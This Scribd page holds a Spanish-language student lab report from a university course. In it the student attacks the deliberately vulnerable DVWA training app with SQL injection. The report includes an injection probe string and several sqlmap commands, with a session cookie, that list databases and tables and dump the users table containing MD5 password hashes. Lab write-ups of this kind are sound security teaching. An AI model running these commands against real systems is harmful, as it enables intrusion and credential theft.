Scribd Logo
Upload

Welcome to Scribd!

  • Briceño - Jiménez - Edgar - Favián - Realizar Ataques SQL Injection Contra La Aplicación DVWA

    Uploaded by

    Fabian Briceño Jiménez
    2K views7 pages
    Analisis de Vulnerabilidades

    Original Title

    Briceño_Jiménez_edgar_Favián_Realizar Ataques SQL Injection Contra La Aplicación DVWA

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Analisis de Vulnerabilidades

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    2K views7 pages

    Briceño - Jiménez - Edgar - Favián - Realizar Ataques SQL Injection Contra La Aplicación DVWA

    Uploaded by

    Fabian Briceño Jiménez
    Analisis de Vulnerabilidades

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 7

    Asignatura Datos del alumno Fecha

    Apellidos: Briceo Jimnez


    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Actividades

    Trabajo: Realizar ataques SQL Injection contra la aplicacin


    DVWA

    En la siguiente actividad debers realizar diversos ataques sobre la aplicacin DVWA


    utilizando la tcnica de SQL injection.

    Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).

    Se valorar positivamente que expliques debidamente los pasos seguidos para la


    realizacin de cada ataque.

    Tendrs que:

    Indicar cul/cules son los parmetros vulnerables de la URL.


    Obtener los nombres de las bases de datos disponibles.
    Recuperar los nombres de las tablas de la base de datos dvwa.
    Recuperar el contenido de las tablas de la base de datos dvwa.

    Extensin mxima: 10 pginas (Georgia 11 e interlineado 1,5).

    DESARROLLO DE LA ACTIVIDAD
    Verificamos la IP de la mquina metasploitable.

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)


    Asignatura Datos del alumno Fecha
    Apellidos: Briceo Jimnez
    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Accedemos va web a esa IP y escogemos la aplicacin DVWA.

    Ya tenemos acceso al aplicativo. Las credenciales de acceso son admin y password

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)


    Asignatura Datos del alumno Fecha
    Apellidos: Briceo Jimnez
    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Indicar cules son los parmetros vulnerables de la URL


    Una buena forma ingresar la sentencia ?id='q&Submit=Submit# en la URL, y si nos da
    como resultado un error SQL, sabemos que es vulnerable.

    Obtener los nombres de las bases de datos disponibles


    Ingresamos a la aplicacin sqlmap de kali linux

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)


    Asignatura Datos del alumno Fecha
    Apellidos: Briceo Jimnez
    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Ejecutamos la siguiente sentencia para que nos muestre las bases de datos disponibles.
    sqlmap -headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
    rv:54.0) Gecko/20100101 Firefox/54.0" -cookie="security=low"
    PHPSESSID=215021843c8f7280a79c68b452ffce6" u
    http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
    -dbs

    Terminada la ejecucin de la accin indicada, nos muestra 7 bases de datos


    encontradas:

    Recuperar los nombres de las tablas de la base de datos dvwa.


    Para recuperar los nombres de la base de datos DVWA, ingresamos la sentencia:
    sqlmap -headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
    rv:54.0) Gecko/20100101 Firefox/54.0" -cookie="security=low"
    PHPSESSID=215021843c8f7280a79c68b452ffce6" u
    http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
    D dvwa -tables

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)


    Asignatura Datos del alumno Fecha
    Apellidos: Briceo Jimnez
    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Nos muestra las 2 tablas de la base de datos DVWA.

    Recuperar el contenido de las tablas de la base de datos dvwa.


    Tabla guestbook:
    Utilizamos la siguiente sentencia para obtener el contenido de sta tabla:
    sqlmap -headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
    rv:54.0) Gecko/20100101 Firefox/54.0" -cookie="security=low"
    PHPSESSID=215021843c8f7280a79c68b452ffce6" u
    http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
    batch dump T guestbook D dvwa

    Contenido de tabla nos muestra lo siguiente:

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)


    Asignatura Datos del alumno Fecha
    Apellidos: Briceo Jimnez
    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Tabla users
    De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla, as:
    sqlmap -headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;
    rv:54.0) Gecko/20100101 Firefox/54.0" -cookie="security=low"
    PHPSESSID=215021843c8f7280a79c68b452ffce6" u
    http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
    batch dump T users D dvwa

    Adems de mostrarnos el contenido, nos indica que el contenido de la tabla users tiene
    encriptacin md5.
    El contenido de la tabla es el siguiente:

    Para comprobar las contraseas encontradas en la tabla anterior, ingresamos a la


    aplicacin web:

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)


    Asignatura Datos del alumno Fecha
    Apellidos: Briceo Jimnez
    Anlisis de
    Vulnerabilidades
    04 07 - 2017
    Nombre: Edgar Favin

    Y vemos que podemos acceder con las contraseas obtenidas.

    TEMA 3 Actividades Universidad Internacional de La Rioja, S. A. (UNIR)

    You might also like